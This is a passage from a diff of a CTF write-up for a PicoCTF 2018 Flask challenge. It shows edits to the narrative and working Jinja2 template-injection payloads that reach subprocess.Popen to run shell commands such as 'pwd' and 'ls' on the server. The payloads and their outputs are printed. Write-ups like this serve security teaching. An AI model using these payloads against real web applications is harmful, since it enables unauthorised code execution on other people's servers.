shiltemann/CTF-writeups-public/PicoCTF_2018/writeup.md

 result: <class 'subprocess.Popen'>
 ```

+Let's try to run it, we'll start with a simple `pwd`:

 ```
 input: {{ ''.__class__.__mro__[1].__subclasses__()[760]('pwd',shell=True).communicate() }}
 result: (None, None)
 ```

-so it is not outputting stdout, normally we would add `stdout=subprocess.PIPE`, but we don't have
+hmm, it is not outputting stdout; normally we would add `stdout=subprocess.PIPE`, but we don't have
-access to it but this turns out to just be the integer `-1`:
+access to `subprocess`, only `subprocess.Popen` is loaded, but this turns out to just be the integer `-1`:

 ```
 input: {{ ''.__class__.__mro__[1].__subclasses__()[760]('pwd',shell=True,stdout=-1).communicate() }}
 result: (b'/problems/flaskcards-and-freedom_4_2cd670d54e75a9ed7cd0e9b76816fc59\n', None)
 ```

+yay! so we can run any shell command!
+Now to get the flag..

-the description mentioned there were files, so let's do an `ls`
+The challenge description mentioned there were files, so let's do an `ls`:

 ```
 input: {{ ''.__class__.__mro__[1].__subclasses__()[760]('ls',shell=True,stdout=-1).communicate() }}